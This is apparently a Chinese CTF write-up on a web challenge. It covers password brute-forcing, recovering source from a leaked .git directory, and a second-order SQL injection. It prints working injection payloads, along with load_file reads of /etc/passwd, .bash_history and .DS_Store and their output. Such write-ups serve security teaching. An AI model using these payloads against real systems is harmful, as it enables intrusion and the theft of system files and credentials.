-
登陆界面提示:
username: zhangwei password: zhangweixxx
猜测后三位需要爆破,凭直觉觉得后三位应该是数字,直接开始爆破。爆破得到后三位是
666
。登陆。
-
扫描站点,发现
.git
泄露githack
一下,得到:<?php include "mysql.php"; session_start(); if($_SESSION['login'] != 'yes'){ header("Location: ./login.php"); die(); } if(isset($_GET['do'])){ switch ($_GET['do']) { case 'write': break; case 'comment': break; default: header("Location: ./index.php"); } } else{ header("Location: ./index.php"); } ?>
源码中,如果
do
为write
或comment
,就直接break
,然而测试时可以知道,我们发帖时do=write
,留言时do=comment
,这说明上面的源码是不完整的。考虑恢复源码。用的是
BugScanTeam
的GitHack
,恢复时,用python
解压了8e
下的文件,得到了完整的源码:import zlib f = open("./f569f235780f24c42b60f50d528a03f7238c80","r").read() zlib.decompress(f)
得到完整源码:
<?php include "mysql.php"; session_start(); if($_SESSION['login'] != 'yes'){ header("Location: ./login.php"); die(); } if(isset($_GET['do'])){ switch ($_GET['do']) { case 'write': $category = addslashes($_POST['category']); $title = addslashes($_POST['title']); $content = addslashes($_POST['content']); $sql = "insert into board set category = '$category', title = '$title', content = '$content'"; $result = mysql_query($sql); header("Location: ./index.php"); break; case 'comment': $bo_id = addslashes($_POST['bo_id']); $sql = "select category from board where id='$bo_id'"; $result = mysql_query($sql); $num = mysql_num_rows($result); if($num>0){ $category = mysql_fetch_array($result)['category']; $content = addslashes($_POST['content']); $sql = "insert into comment set category = '$category', content = '$content', bo_id = '$bo_id'"; $result = mysql_query($sql); } header("Location: ./comment.php?id=$bo_id"); break; default: header("Location: ./index.php"); } }else{ header("Location: ./index.php"); } ?>
源码一看就知道是二次注入。二次注入需要满足的条件是:第一次插入表时进行了一定的过滤,但是之后从表中选出后进行其他操作时,没有进行过滤。按照这个点在源码中寻找,发现
category
存在二次注入。发表评论时,我们输入的评论会显示出来,可以猜测这里是一个回显的点。构造语句如下:
insert into comment set category='1',content=(select database()),/* content='*/#', bo_id='$bo_id'
注意这里注释符的使用,
/*...*/
注释中间一段,#
注释这一行后面的内容,所以我们就可以通过content
回显查询结果。在数据库里面找了一圈也没看见
flag
,但是发现load_file
可以用,于是:insert into comment set category='1',content=(select load_file('/etc/passwd')),/* content='*/#', bo_id='$bo_id'
得到:
root:x:0:0:root:/root:/bin/bash daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin bin:x:2:2:bin:/bin:/usr/sbin/nologin sys:x:3:3:sys:/dev:/usr/sbin/nologin sync:x:4:65534:sync:/bin:/bin/sync games:x:5:60:games:/usr/games:/usr/sbin/nologin man:x:6:12:man:/var/cache/man:/usr/sbin/nologin lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin mail:x:8:8:mail:/var/mail:/usr/sbin/nologin news:x:9:9:news:/var/spool/news:/usr/sbin/nologin uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin proxy:x:13:13:proxy:/bin:/usr/sbin/nologin www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin backup:x:34:34:backup:/var/backups:/usr/sbin/nologin list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin libuuid:x:100:101::/var/lib/libuuid: syslog:x:101:104::/home/syslog:/bin/false mysql:x:102:105:MySQL Server,,,:/var/lib/mysql:/bin/false www:x:500:500:www:/home/www:/bin/bash
这里有个
www
用户,首先查看一下/home/www
下的.bash_history
:select load_file('/home/www/html/.bash_history')
,得:cd /tmp/ unzip html.zip rm -f html.zip cp -r html /var/www/ cd /var/www/html/ rm -f .DS_Store service apache2 start
从这些历史命令我们可以看出
/tmp/html
下是有.DS_Store
文件的,所以:select load_file('/tmp/html/.DS_Store')
,显示不完整,所以select hex(load_file('/tmp/html/.DS_Store'))
,得到的结果解码以后可以看到:
于是读这个文件:select load_file('/var/www/html/flag_8946e1ff1ee3e40f.php')
,或者select load_file('/tmp/html/flag_8946e1ff1ee3e40f.php')
,得flag